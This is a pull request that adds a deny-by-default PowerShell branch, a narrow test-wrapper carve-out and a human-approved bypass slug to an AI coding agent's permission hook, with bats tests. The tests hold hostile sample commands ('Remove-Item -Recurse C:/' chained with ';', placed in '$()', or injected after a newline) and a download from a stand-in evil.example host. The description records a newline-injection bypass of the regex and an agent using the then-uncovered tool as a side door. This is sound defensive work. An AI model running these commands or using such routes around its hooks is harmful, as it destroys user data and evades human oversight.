### PR TITLE
feat(hooks): PowerShell deny-by-default with test-wrapper carve-out + bypass

### DIFF
--- a/.claude/hooks/README.md
+++ b/.claude/hooks/README.md
@@ -72,6 +72,17 @@ The recurring-bypass pattern — same slug bypassed every session — is a signa
 
 **Adding a new redirect.** Append a row to the `[redirect-commands]` section of `.claude/hooks/hook-rules`: `<slug> | <pattern> | <suggestion>`. The slug must match `^[a-z][a-z0-9-]*$` (start with a letter so the `ws hook-bypass [a-z]*` ask-pattern always catches a slug invocation). The pattern is a bash glob. The suggestion is free text (column 3, may contain pipes — parsing splits on the first two ` | ` only). The new slug is automatically bypassable via `ws hook-bypass <new-slug>`; no script change needed.
 
+### PowerShell: blocked by default
+
+The hook also registers on the `PowerShell` tool (see `settings.json`) and denies every invocation rather than porting the Bash tiers to PowerShell grammar. The rationale: the `ws` CLI + Bash tool are the sanctioned surface, agents observably drift into PowerShell once it starts "working," and a granular PowerShell tier would need its own grammar — PS 5.1 has no `&&`/`||`, so `;` is its *only* statement separator, and a naive port of the Tier 1 composition deny would make the tool unusable rather than safe.
+
+Two exceptions:
+
+- **Component kuttl test wrappers auto-allow.** kuttl ships no native Windows binary, so components wrap it in Docker via `test.ps1` (mimir, nidavellir). The allowed shapes are `./test.ps1 [args]` and `Set-Location <dir>; ./test.ps1 [args]` (also `cd`/`.\` forms), with both segments restricted to composition-free characters — no `;` chains beyond the single prefix, no `$()`/backticks/script blocks in the path or args. As everywhere else, the hook audits the invocation string only; what a committed script does internally is reviewed at the script's own PR, not at invocation time.
+- **`ws hook-bypass powershell`** grants a session-scoped raw-PowerShell bypass through the same human-gated ask flow as the Tier 2/3 slugs (it's a built-in slug in `ws-hook-bypass.sh`, not a `hook-rules` row). The intended use is the rare case where PowerShell is genuinely the right tool — e.g. piping test payloads into *this hook* while debugging it, which Bash Tier 1 redirection rules block by design.
+
+`WS_HOOK_DISABLE=1` disables this branch along with everything else.
+
 ## Optional: PermissionRequest hook
 
 Power-user opt-in. Wires the same `gdd-permission-hook.sh` script to a second hook event — `PermissionRequest` — and broadens its matcher to also cover the `Edit` and `Write` tools. Net effect:

--- a/.claude/hooks/gdd-permission-hook.sh
+++ b/.claude/hooks/gdd-permission-hook.sh
@@ -600,11 +600,25 @@ if [[ "$tool_name" == "PowerShell" ]]; then
     # The character class excludes composition, redirection, variable /
     # subexpression expansion, backticks, and script blocks in BOTH the
     # path and the args — `./test.ps1 $(...)` must not slip through.
-    _ps_seg='[^;|&<>$`(){}]'
-    _ps_wrapper_re="^(([Ss]et-[Ll]ocation|cd)[[:space:]]+${_ps_seg}+;[[:space:]]*)?\.[/\\]test\.ps1([[:space:]]${_ps_seg}*)?$"
-    if [[ "$cmd" =~ $_ps_wrapper_re ]]; then
-        allow "powershell test-wrapper carve-out"
-    fi
+    #
+    # CR/LF guard first: newline is a full statement separator in
+    # PowerShell, and both [[:space:]] and a negated bracket class match
+    # it — so without this case arm, `./test.ps1<newline>Remove-Item …`
+    # would satisfy the regex and auto-allow (caught in review by
+    # CodeRabbit + Copilot, repro-verified). The Bash branch's Tier 1
+    # newline deny never runs for PowerShell, so the rejection has to
+    # live here. The [ \t]-only separators below are belt-and-braces.
+    case "$cmd" in
+        *$'\n'*|*$'\r'*)
+            : ;;  # multi-line — never carve-out; fall through to deny/bypass
+        *)
+            _ps_seg='[^;|&<>$`(){}'$'\n\r'']'
+            _ps_wrapper_re="^(([Ss]et-[Ll]ocation|cd)[ \t]+${_ps_seg}+;[ \t]*)?\.[/\\]test\.ps1([ \t]${_ps_seg}*)?$"
+            if [[ "$cmd" =~ $_ps_wrapper_re ]]; then
+                allow "powershell test-wrapper carve-out"
+            fi
+            ;;
+    esac
 
     # Session-scoped bypass marker — same mechanics as the Tier 2/3
     # slugs (written by `ws hook-bypass powershell`, honored only when

--- a/.claude/hooks/gdd-permission-hook.sh
+++ b/.claude/hooks/gdd-permission-hook.sh
@@ -4,8 +4,10 @@
 # ─────────────────────────────────────────────────────────────────────
 #
 # PURPOSE
-# Fires on PreToolUse for Bash (four-tier deny/ask/allow logic) and for
-# Edit/Write (scratch-dir auto-allow). Has dormant PermissionRequest
+# Fires on PreToolUse for Bash (four-tier deny/ask/allow logic), for
+# Edit/Write (scratch-dir auto-allow), and for PowerShell (deny-by-
+# default with a test-wrapper carve-out + `powershell` bypass slug —
+# see the PowerShell branch below). Has dormant PermissionRequest
 # support wired in but not registered by default. Inspects the tool
 # input and emits one of four outcomes:
 #
@@ -568,6 +570,69 @@ if [[ "$tool_name" == "Edit" || "$tool_name" == "Write" ]]; then
 
     # No scratch-dir match → passthrough so the harness prompts.
     exit 0
+fi
+
+# ─── Tool routing: PowerShell branch (deny-by-default) ──────────────
+#
+# Policy (2026-06-11): PowerShell is not part of the workspace toolkit.
+# The `ws` CLI + Bash tool cover the sanctioned surface, and porting the
+# Bash tiers to PowerShell grammar would be a large, error-prone job for
+# a tool agents shouldn't be drifting into (PS 5.1 has no && / ||, so
+# `;` is its ONLY statement separator — a naive port of the Tier 1 deny
+# rules would be unusable rather than safe). So: deny everything, with
+# two narrow exceptions —
+#
+#   1. Component kuttl test wrappers. kuttl ships no native Windows
+#      binary, so components wrap it in Docker via test.ps1 (mimir,
+#      nidavellir). The shapes `./test.ps1 [args]` and
+#      `Set-Location <dir>; ./test.ps1 [args]` auto-allow, with both
+#      segments restricted to composition-free characters. As with bash
+#      scripts, the hook audits the invocation string only — script
+#      internals are out of scope by design.
+#   2. A session-scoped bypass marker (`ws hook-bypass powershell`),
+#      human-approved through the ask tier like every other slug — for
+#      the rare legitimate raw-PowerShell need (e.g. piping payloads
+#      into THIS hook while debugging it, which Bash Tier 1 blocks).
+if [[ "$tool_name" == "PowerShell" ]]; then
+    # Carve-out: component test wrapper, optionally preceded by ONE
+    # Set-Location/cd (the PowerShell tool's cwd persists across calls,
+    # so suite runs are typically `Set-Location <comp>; ./test.ps1 …`).
+    # The character class excludes composition, redirection, variable /
+    # subexpression expansion, backticks, and script blocks in BOTH the
+    # path and the args — `./test.ps1 $(...)` must not slip through.
+    _ps_seg='[^;|&<>$`(){}]'
+    _ps_wrapper_re="^(([Ss]et-[Ll]ocation|cd)[[:space:]]+${_ps_seg}+;[[:space:]]*)?\.[/\\]test\.ps1([[:space:]]${_ps_seg}*)?$"
+    if [[ "$cmd" =~ $_ps_wrapper_re ]]; then
+        allow "powershell test-wrapper carve-out"
+    fi
+
+    # Session-scoped bypass marker — same mechanics as the Tier 2/3
+    # slugs (written by `ws hook-bypass powershell`, honored only when
+    # its session_id matches the current session). Project root prefers
+    # CLAUDE_PROJECT_DIR, then the hook-rules dir found by the config
+    # walk, then $cwd — the marker lives at <root>/.tmp/hook-bypass/.
+    _ps_session_id=$(echo "$input" | jq -r '.session_id // ""')
+    _ps_project_root="${CLAUDE_PROJECT_DIR:-}"
+    if [[ -z "$_ps_project_root" && -n "${_rules_dir:-}" ]]; then
+        _ps_project_root="${_rules_dir%/.claude/hooks}"
+    fi
+    [[ -z "$_ps_project_root" ]] && _ps_project_root="$cwd"
+    _ps_marker="$_ps_project_root/.tmp/hook-bypass/powershell.bypass"
+    if [[ -f "$_ps_marker" ]]; then
+        _ps_marker_sid=$(grep '^session_id:' "$_ps_marker" 2>/dev/null | sed 's/^session_id: *//' || true)
+        _ps_marker_reason=$(grep '^reason:' "$_ps_marker" 2>/dev/null | sed 's/^reason: *//' || true)
+        if [[ -n "$_ps_session_id" && "$_ps_marker_sid" == "$_ps_session_id" ]]; then
+            echo "[$(date '+%Y-%m-%d %H:%M:%S')] BYPASS-ALLOW [powershell] reason=\"$(audit_safe "$_ps_marker_reason")\" [$event]: $(audit_safe "$cmd")" >> "$audit_log"
+            if [[ "$event" == "PermissionRequest" ]]; then
+                printf '%s\n' '{"hookSpecificOutput":{"hookEventName":"PermissionRequest","decision":{"behavior":"allow"}}}'
+            else
+                printf '%s\n' '{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"allow"}}'
+            fi
+            exit 0
+        fi
+    fi
+
+    deny "PowerShell is blocked by default in this workspace — use the Bash tool with the \`ws\` wrappers (see AGENTS.md Reflex Contract). Exception: component kuttl wrappers run without a prompt as \`./test.ps1 [suite]\`, optionally preceded by one \`Set-Location <dir>;\`. For a genuine raw-PowerShell need (e.g. hook debugging), request a session-scoped bypass: \`ws hook-bypass powershell --reason \"<why>\"\` — a human approves it and it expires with the session."
 fi
 
 # ─── Tier 1: Deny shell composition with corrective messages ────────

--- a/.claude/settings.json
+++ b/.claude/settings.json
@@ -290,6 +290,15 @@
             "command": "bash \"$CLAUDE_PROJECT_DIR/.claude/hooks/gdd-permission-hook.sh\""
           }
         ]
+      },
+      {
+        "matcher": "PowerShell",
+        "hooks": [
+          {
+            "type": "command",
+            "command": "bash \"$CLAUDE_PROJECT_DIR/.claude/hooks/gdd-permission-hook.sh\""
+          }
+        ]
       }
     ]
   }

--- a/scripts/ws-hook-bypass.sh
+++ b/scripts/ws-hook-bypass.sh
@@ -11,9 +11,10 @@
 #
 # <slug> must appear as column 1 of a row in .claude/hooks/hook-rules
 # under [redirect-commands] (Tier 2) or [adapter-redirect-commands]
-# (Tier 3). The script writes .tmp/hook-bypass/<slug>.bypass with
-# frontmatter the PreToolUse hook parses
-# (session_id, slug, created_at, reason).
+# (Tier 3), or be a built-in tool-deny slug (currently: powershell —
+# unblocks the hook's whole-tool PowerShell deny for the session).
+# The script writes .tmp/hook-bypass/<slug>.bypass with frontmatter
+# the PreToolUse hook parses (session_id, slug, created_at, reason).
 #
 # The subcommand pattern `ws hook-bypass [a-z]*` is on the committed
 # [ask-commands] baseline, so every invocation force-prompts the human —
@@ -35,8 +36,9 @@ Usage: ws hook-bypass <slug> [--reason "<text>"]
 
   <slug>           Bypass slug — must match a row in [redirect-commands]
                    (Tier 2) or [adapter-redirect-commands] (Tier 3) in
-                   .claude/hooks/hook-rules. Run with an unknown slug
-                   to see the list of known slugs.
+                   .claude/hooks/hook-rules, or a built-in tool-deny slug
+                   (powershell). Run with an unknown slug to see the list
+                   of known slugs.
   --reason "<txt>" Optional. Captured in the marker file and echoed into
                    each BYPASS-ALLOW audit-log entry for retro grep.
 
@@ -97,7 +99,11 @@ done
 # adapter-redirect denies instruct users to bypass via `ws hook-bypass`,
 # so the script must accept those slugs too — otherwise the deny message
 # tells users to do something the script refuses to do.
-known_slugs=()
+# Built-in slugs not derived from hook-rules rows. `powershell` gates
+# the hook's whole-tool PowerShell deny (there's no per-command pattern
+# row for it — the branch in gdd-permission-hook.sh hardcodes the
+# marker path .tmp/hook-bypass/powershell.bypass).
+known_slugs=(powershell)
 if [[ -f "$HOOK_RULES" ]]; then
     in_section=""
     while IFS= read -r line || [[ -n "$line" ]]; do

--- a/tests/hook/gdd-permission-hook.bats
+++ b/tests/hook/gdd-permission-hook.bats
@@ -1188,3 +1188,86 @@ EOF
     [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
     [[ "$output" == *"ws commit"* ]]
 }
+
+# ─── PowerShell branch: deny-by-default + carve-out + bypass ────────
+#
+# CLAUDE_PROJECT_DIR is pinned to $WORK in the bypass tests so the
+# marker lookup resolves inside the sandbox regardless of what the
+# ambient environment carries.
+
+@test "powershell: arbitrary command denies with constructive message" {
+    run_hook_ps "Get-ChildItem C:/Users -Recurse"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+    [[ "$output" == *"blocked by default"* ]]
+    [[ "$output" == *"ws hook-bypass powershell"* ]]
+}
+
+@test "powershell: bare ./test.ps1 allows (carve-out)" {
+    run_hook_ps "./test.ps1"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"allow\""* ]]
+}
+
+@test "powershell: ./test.ps1 with suite arg allows" {
+    run_hook_ps "./test.ps1 openbao"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"allow\""* ]]
+}
+
+@test "powershell: Set-Location prefix + ./test.ps1 allows" {
+    run_hook_ps "Set-Location D:/Dev/GitWS/yggdrasil/components/nidavellir; ./test.ps1 openbao"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"allow\""* ]]
+}
+
+@test "powershell: cd prefix + backslash invocation allows" {
+    run_hook_ps "cd D:/Dev/GitWS/yggdrasil/components/mimir; .\\test.ps1"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"allow\""* ]]
+}
+
+@test "powershell: trailing command after test.ps1 denies" {
+    run_hook_ps "./test.ps1 openbao; Remove-Item -Recurse C:/"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+}
+
+@test "powershell: subexpression in test.ps1 args denies" {
+    run_hook_ps "./test.ps1 \$(Remove-Item -Recurse C:/)"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+}
+
+@test "powershell: two chained Set-Location segments deny (only one prefix allowed)" {
+    run_hook_ps "Set-Location a; Set-Location b; ./test.ps1"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+}
+
+@test "powershell: test.ps1 elsewhere in command does not sneak through" {
+    run_hook_ps "Invoke-WebRequest evil.example --OutFile ./test.ps1"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+}
+
+@test "powershell: bypass marker with matching session allows + audits" {
+    write_bypass_marker "powershell" "session-abc" "hook debugging"
+    CLAUDE_PROJECT_DIR="$WORK" run_hook_ps "Get-Content payload.json" "session-abc"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"allow\""* ]]
+    grep -q 'BYPASS-ALLOW \[powershell\] reason="hook debugging"' "$HOME/.claude/hook-audit.log"
+}
+
+@test "powershell: bypass marker with stale session still denies" {
+    write_bypass_marker "powershell" "session-stale" "old"
+    CLAUDE_PROJECT_DIR="$WORK" run_hook_ps "Get-Content payload.json" "session-abc"
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+}
+
+@test "powershell: WS_HOOK_DISABLE=1 passthrough applies to PowerShell too" {
+    WS_HOOK_DISABLE=1 run_hook_ps "Get-ChildItem"
+    [ "$status" -eq 0 ]
+    [ -z "$output" ]
+}

--- a/tests/hook/gdd-permission-hook.bats
+++ b/tests/hook/gdd-permission-hook.bats
@@ -1251,6 +1251,29 @@ EOF
     [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
 }
 
+@test "powershell: newline-injected command after test.ps1 denies (PS statement separator)" {
+    # Newline is a full statement separator in PowerShell, and both
+    # [[:space:]] and a negated bracket class match it — this is the
+    # exact bypass CodeRabbit repro'd in PR #95 review.
+    run_hook_ps $'./test.ps1 openbao\nRemove-Item -Recurse C:/'
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+    [[ "$output" != *"\"permissionDecision\":\"allow\""* ]]
+}
+
+@test "powershell: CR-injected command after test.ps1 denies" {
+    run_hook_ps $'./test.ps1 openbao\rRemove-Item -Recurse C:/'
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+    [[ "$output" != *"\"permissionDecision\":\"allow\""* ]]
+}
+
+@test "powershell: newline before Set-Location prefix also denies" {
+    run_hook_ps $'Remove-Item -Recurse C:/\nSet-Location comp; ./test.ps1'
+    [ "$status" -eq 0 ]
+    [[ "$output" == *"\"permissionDecision\":\"deny\""* ]]
+}
+
 @test "powershell: bypass marker with matching session allows + audits" {
     write_bypass_marker "powershell" "session-abc" "hook debugging"
     CLAUDE_PROJECT_DIR="$WORK" run_hook_ps "Get-Content payload.json" "session-abc"

--- a/tests/hook/test_helper.bash
+++ b/tests/hook/test_helper.bash
@@ -168,6 +168,24 @@ run_hook_with_session() {
     run "$TIMEOUT_BIN" 10 bash "$HOOK_BIN" <<< "$payload"
 }
 
+# Build a PowerShell tool-call payload and pipe it into the hook.
+# The PowerShell branch is deny-by-default with a test-wrapper
+# carve-out and a `powershell` bypass slug, so tests need the real
+# tool_name plus (optionally) a session_id for the bypass cases.
+#
+# Args: $1 = command string, $2 = session_id (optional, empty = omit),
+#       $3 = cwd (defaults to $WORK)
+run_hook_ps() {
+    local cmd="$1"
+    local session_id="${2:-}"
+    local cwd="${3:-$WORK}"
+    local payload
+    payload=$(jq -nc --arg cmd "$cmd" --arg cwd "$cwd" --arg sid "$session_id" \
+        '{tool_name:"PowerShell", tool_input:{command:$cmd}, cwd:$cwd}
+         + (if $sid == "" then {} else {session_id:$sid} end)')
+    run "$TIMEOUT_BIN" 10 bash "$HOOK_BIN" <<< "$payload"
+}
+
 # Set up an active realm + component dir under $WORK so the adapter-
 # aware redirect tier (Tier 3) has something to resolve.
 #   $1 — component name (e.g. "knarrlike")

--- a/tests/ws-cli/hook-bypass.bats
+++ b/tests/ws-cli/hook-bypass.bats
@@ -70,6 +70,20 @@ EOF
     [ ! -f "$WORK/.tmp/hook-bypass/git-commit.bypass" ]
 }
 
+@test "built-in powershell slug is accepted without a hook-rules row" {
+    run bash "$SCRIPT" powershell --reason "hook debugging"
+    [ "$status" -eq 0 ]
+    [ -f "$WORK/.tmp/hook-bypass/powershell.bypass" ]
+    grep -q '^slug: powershell$' "$WORK/.tmp/hook-bypass/powershell.bypass"
+    grep -q '^reason: hook debugging$' "$WORK/.tmp/hook-bypass/powershell.bypass"
+}
+
+@test "unknown-slug listing includes the built-in powershell slug" {
+    run bash "$SCRIPT" not-a-slug
+    [ "$status" -eq 1 ]
+    [[ "$output" == *"powershell"* ]]
+}
+
 @test ".tmp/hook-bypass/ auto-created if absent" {
     [ ! -d "$WORK/.tmp/hook-bypass" ]
     run bash "$SCRIPT" git-push


### PR DESCRIPTION
> **AI-assisted change proposal.** Filed by agent driven by @Cervator via [GDD](https://siliconsaga.github.io/yggdrasil/gdd/).

## Summary

- **PowerShell tool is now hook-covered, deny-by-default.** Rather than porting the Bash tiers to PowerShell grammar (PS 5.1 has no `&&`/`||` — `;` is its *only* statement separator, so a naive port of the Tier 1 composition deny would make the tool unusable rather than safe), the hook registers a `PowerShell` matcher and denies everything with a constructive message pointing back at the Bash tool + `ws` wrappers.
- **Carve-out: component kuttl wrappers auto-allow.** `./test.ps1 [args]` (also `.\` and `cd`/`Set-Location`-prefixed forms), with both segments restricted to a composition-free character class — no chains, `$()` subexpressions, backticks, or script blocks. kuttl has no native Windows binary, so mimir/nidavellir wrap it in Docker via `test.ps1`; that's the one sanctioned PowerShell entry point today.
- **Escape hatch: `ws hook-bypass powershell`** — session-scoped raw-PowerShell bypass through the existing human-gated ask flow, added as a built-in slug (no hook-rules row). For the rare legitimate case, e.g. stdin-feeding payloads into the hook itself while debugging it, which Bash Tier 1 redirection rules block by design.
- **Docs:** new "PowerShell: blocked by default" section in `.claude/hooks/README.md` with the rationale + both exceptions; hook header + `ws hook-bypass` usage updated.

Background: months of observation show agents drift into PowerShell once it starts working (and an agent used the then-uncovered tool as a hook-debugging side door earlier today — benign, but exactly the gap this closes). Deny-with-bypass keeps the toolkit Bash-first with nothing granular to maintain.

## Test plan

- [x] 12 new hook bats cases: deny message content, all carve-out shapes (bare/args/`Set-Location`/`cd`/backslash), rejection of trailing chains + `$()` in args + double-prefix + `test.ps1`-as-argument smuggling, bypass marker match/stale/audit-line, `WS_HOOK_DISABLE` passthrough
- [x] 2 new `ws hook-bypass` cases: built-in slug accepted + listed in unknown-slug output
- [x] Full workspace suite: 306/306 green (`ws test yggdrasil`)

## Related

- Follows the PowerShell-coverage design note logged in the Loki thalamus Backlog (2026-06-11); the cross-platform `ws test` adapter shim for test.ps1 components remains a follow-up there


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * PowerShell invocations are deny-by-default, with a session-scoped bypass slug that writes an audit entry when used.
  * Auto-allow limited single-file test-wrapper patterns and simple working-directory prefixes.

* **Documentation**
  * Clarified PowerShell behavior, bypass usage, and WS_HOOK_DISABLE handling.

* **Tests**
  * Added extensive PowerShell-focused tests and helpers covering deny/default, carve-outs, bypass, and disable scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->